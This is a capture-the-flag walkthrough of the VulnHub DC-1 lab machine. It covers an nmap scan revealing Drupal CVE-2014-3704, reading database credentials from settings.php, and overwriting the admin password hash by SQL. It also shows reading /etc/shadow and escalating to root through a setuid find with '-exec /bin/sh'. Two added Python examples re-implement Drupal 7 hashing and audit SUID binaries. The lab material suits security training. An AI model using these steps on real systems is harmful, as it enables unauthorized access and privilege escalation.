vulnhub DC:1 - Capturing the Flags

Download: https://download.vulnhub.com/dc/DC-1.zip

nmap -A -T4 10.10.10.132 --script=vuln


Nmap scan report for 10.10.10.132
Host is up (0.00034s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.132
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.132:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|
|     Path: http://10.10.10.132:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|
|     Path: http://10.10.10.132:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|
|     Path: http://10.10.10.132:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|
|     Path: http://10.10.10.132:80/user
|     Form id: user-login
|     Form action: /user
|     
|     Path: http://10.10.10.132:80/user/
|     Form id: user-login
|_    Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       http://www.securityfocus.com/bid/70595
|       https://www.drupal.org/SA-CORE-2014-005
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36912/udp   status
|   100024  1          37215/tcp6  status
|   100024  1          52947/udp6  status
|_  100024  1          54937/tcp   status
MAC Address: 00:0C:29:3D:43:A8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 10.10.10.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 530.45 seconds

The scan results show that the host is affected by CVE-2014-3704.
Search for it with searchsploit; the -m option copies the exploit into the current directory.

Next, search for it in msf (Metasploit).

Exploit the vulnerability to get a shell.

Switch to a shell:
cat flag1.txt
Every good CMS needs a config file - and so do you.

That is flag1.
Next, look for the Drupal configuration file.
Drupal's database configuration file lives by default at
/sites/default/settings.php
flag2 is found there.

cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

Use python to spawn an interactive shell and check the current privileges:

python -c '__import__("pty").spawn("/bin/bash")'

We can see that we are running with www (web server) privileges.

Looking at the database,

we find that the password hashes are salted, so cracking them is fairly hard. Instead, we can update the password directly, or use another method.

update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';
Then log in with the password "password".
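Why the hashes in the users table are slow to crack, and what the $S$... value actually is: the following is an added example (not code from the original post or from Drupal itself) that re-implements Drupal 7's password hashing in Python, parses the iteration count from the hash, and checks one candidate password the way Drupal's login does. The example password and salt used for self-checks are constructed here.

```python
# Added example (not from the original post): Python re-implementation of Drupal 7's
# password hashing (includes/password.inc), the $S$... format seen in the users table.
import hashlib

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55      # DRUPAL_HASH_LENGTH: the stored value is truncated to 55 chars

def _b64(data: bytes) -> str:
    """phpass-style base64 (not RFC 4648) that Drupal uses for salt and digest."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)

def iterations(setting: str) -> int:
    """Round count is 2**(index of the 4th char in ITOA64): 'C' -> 2**14 = 16384."""
    log2 = ITOA64.index(setting[3])
    if not 7 <= log2 <= 30:       # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        raise ValueError('iteration count out of range')
    return 1 << log2

def drupal7_hash(password: str, setting: str) -> str:
    """_password_crypt('sha512', ...): salted SHA-512 iterated 2**log2 times."""
    setting = setting[:12]        # '$S$' + count char + 8-char salt
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        raise ValueError('malformed setting')
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(iterations(setting)):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    """The comparison user_check_password() makes at login: one candidate, no wordlist."""
    return drupal7_hash(password, stored) == stored
```

Each check costs 2^14 SHA-512 rounds for a hash starting with $S$C, which is what makes dictionary attacks against these hashes slow compared with a plain salted SHA-512.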

Earlier, searchsploit also turned up a script that can add an account with administrator privileges.

Copy this script into the current directory.
This also lets us log in as the administrator.
It can directly add an account with admin privileges.
That gives us the third flag.

Check the hint:

whoami
uname -a
cat /etc/passwd
cat /etc/shadow

flag4 is found in the home directory.
It tells you that root access is needed.
Next comes privilege escalation.
flag3 hinted at using find -exec.
Search for programs with the SUID bit set:

find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -u=s 2>/dev/null

find turns out to run with root privileges (SUID).
Then use find … -exec "…" to run a command on the files it finds:

find ./ -exec "whoami" \;
find ./ -exec "/bin/sh" \;

Successfully escalated to root.

Successfully got the fifth flag.
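The root step above works only because find carries the SUID bit. As an added example (not from the original post), the following Python audit compares a host's SUID binaries against an expected baseline and prints the remediation for anything extra; the baseline and the sample file list are constructed for this example and are not authoritative.

```python
# Added example (not from the original post): audit a host's SUID binaries against an
# expected baseline and emit the fix for extras, so a setuid find is caught early.
import os
import stat

# Constructed baseline of SUID files normal on a Debian-style host; not authoritative.
BASELINE = {
    '/bin/su', '/bin/mount', '/bin/umount', '/usr/bin/passwd',
    '/usr/bin/sudo', '/usr/bin/chsh', '/usr/bin/gpasswd', '/usr/bin/newgrp',
}

def scan_suid(root: str = '/') -> set:
    """Equivalent of `find / -type f -perm -4000`; lstat so symlinks are skipped."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def unexpected_suid(found, baseline=BASELINE) -> list:
    """SUID files not in the baseline, sorted for stable reporting."""
    return sorted(set(found) - set(baseline))

def remediation(paths) -> list:
    """Shell commands that drop the setuid bit from each unexpected file."""
    return ['chmod u-s ' + p for p in paths]

if __name__ == '__main__':
    # Constructed sample standing in for `find` output on a host like DC-1;
    # call scan_suid() to check the live filesystem instead.
    sample = {'/bin/su', '/bin/mount', '/usr/bin/passwd', '/usr/bin/find', '/usr/bin/sudo'}
    for cmd in remediation(unexpected_suid(sample)):
        print(cmd)   # prints: chmod u-s /usr/bin/find
```

Run it periodically (or from a config-management check) so that a setuid bit added to a general-purpose tool shows up as drift before it is abused.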

Original article, author: 运营. If reposting, please cite the source: http://www.csxxaq.com/yc/814.html